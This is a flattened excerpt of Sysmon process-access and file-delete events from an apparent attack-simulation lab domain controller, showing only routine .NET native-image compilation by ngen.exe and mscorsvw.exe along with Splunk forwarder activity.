21:07:01.949{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-5705-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022931Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.949{4DB9351A-A275-60D3-5605-00000000CF01}6536NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\488O5QYZMU\Microsoft.PowerShell.Activities.ni.dll.auxMD5=0C44E7BF02991DAC521CB3744E1BD300,SHA256=D38C36EE9CBDFA89B022CBAEF4E6B5460CFF09E58B2D37B47AA6957B690EFD82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022930Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.949{4DB9351A-A275-60D3-5605-00000000CF01}6536NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\488O5QYZMU\Microsoft.PowerShell.Activities.ni.dllMD5=77FBD2A6B0A8AE078B2041B0A9D250A8,SHA256=4B0C8B12FF457322608C7B3F61D8B05655B53E3F360941C0B8F55505CD87F927,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022929Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.855{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-5605-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022928Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.839{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-5605-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.839{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-5605-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.839{4DB9351A-A275-60D3-5505-00000000CF01}3252NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PRPW8KKOFQ\Microsoft.NetworkController.SDNDiagnosticsTask.ni.dll.auxMD5=ADDFC3E5E529E1CB3951121F5A4F8320,SHA256=E09DA27662B601D35B61AF8654B613AAF0D3930B2B5DFD8358F8CF23EE1B7510,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.839{4DB9351A-A275-60D3-5505-00000000CF01}3252NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PRPW8KKOFQ\Microsoft.NetworkController.SDNDiagnosticsTask.ni.dllMD5=FCC8647DB33C1796BDF44D1220BCF249,SHA256=DF27D6B5FD90264002CD0634813B165B7E9F17A6C30BE0E7CA9176A02884E2E1,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.824{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-5505-00000000CF01}3252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.808{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DFF73F6DF590400D0068E0A5060D53D0,SHA256=79F30A30614A80F6B64251A4D261FBA968E52CDD3BC2D6E38C9FDE3BB9A01C3E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.808{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-5505-00000000CF01}3252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.808{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-5505-00000000CF01}3252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.808{4DB9351A-A275-60D3-5405-00000000CF01}6720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FGBRPWYDOK\Microsoft.ManagementConsole.ni.dll.auxMD5=16036F843CF900E1F03B8B9A2EF47C0A,SHA256=41ACBD3EE4A0DF75F3C9B6C91A2FD0C9EEC20407853A7F83142517E16045D048,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.808{4DB9351A-A275-60D3-5405-00000000CF01}6720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FGBRPWYDOK\Microsoft.ManagementConsole.ni.dllMD5=F65B5D58B6FC8F93E3D02C7472AE16F1,SHA256=7250E85C13D83F497E59064031EC60E2E2863FABB41A1F614D6A190A1908AAC5,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.777{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-5405-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022917Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.761{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-5405-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022916Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.761{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-5405-00000000CF01}6720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022915Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.761{4DB9351A-A275-60D3-5305-00000000CF01}4468NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0EAQRPPXOA\Microsoft.Management.UI.ni.dll.auxMD5=192505543F6ACCEFE07B5D727406522C,SHA256=9AC41A3509A37AFE42059FA89659F9E14C6B3C96F06920B41261DC4BA49E6637,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022914Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.761{4DB9351A-A275-60D3-5305-00000000CF01}4468NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0EAQRPPXOA\Microsoft.Management.UI.ni.dllMD5=DC449D78D0F0B915796AF5F33FBA903B,SHA256=DAF083412AB375400B4355BCFC4E1FC4A55993BDC5850505E4537B0777657BF9,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022913Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.668{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D4002B405F584963FCFD83D86E2E3D5,SHA256=2A065695AC7A219C7F132FA1234429DA53EFA61782B4C2F7CBA221FB922687EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022912Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.496{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-5305-00000000CF01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022911Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.496{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-5305-00000000CF01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022910Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.480{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-5305-00000000CF01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022909Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.480{4DB9351A-A275-60D3-5205-00000000CF01}5288NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\M9RLJVSJBM\Microsoft.Management.Infrastructure.Native.ni.dll.auxMD5=EE69AFD713F28C65D9ACA762935E3251,SHA256=FA5FA2C429987DA7EEFC719B47FF4641457071A11AB43DA1976B93583218AF11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022908Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.480{4DB9351A-A275-60D3-5205-00000000CF01}5288NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\M9RLJVSJBM\Microsoft.Management.Infrastructure.Native.ni.dllMD5=2801FA636D43590D8C59E2293C454B55,SHA256=BFFDA41F016A70EA7C3D2D9FC3E9B84087FAEBC658EDAE13F4F994521482C1F5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022907Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.480{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20909B60D07EC6FBA000F299789310E4,SHA256=0D406761EA248DE40E8FACE7C0C16E84CDE2F90B9CC48595D94B7A085AA0D2F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022906Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.464{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A275-60D3-5205-00000000CF01}5288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022905Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.449{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A275-60D3-5205-00000000CF01}5288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022904Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.449{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A275-60D3-5205-00000000CF01}5288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022903Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.449{4DB9351A-A275-60D3-5105-00000000CF01}3980NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6IT7R10KBG\Microsoft.Management.Infrastructure.CimCmdlets.ni.dll.auxMD5=2CFDEB66872163F25F8DB54F7BDB7479,SHA256=0101CB52582F0FD720B2E28BCCEF31E13554382DD2F9E11F54C0839E019C5832,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022902Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:01.449{4DB9351A-A275-60D3-5105-00000000CF01}3980NT 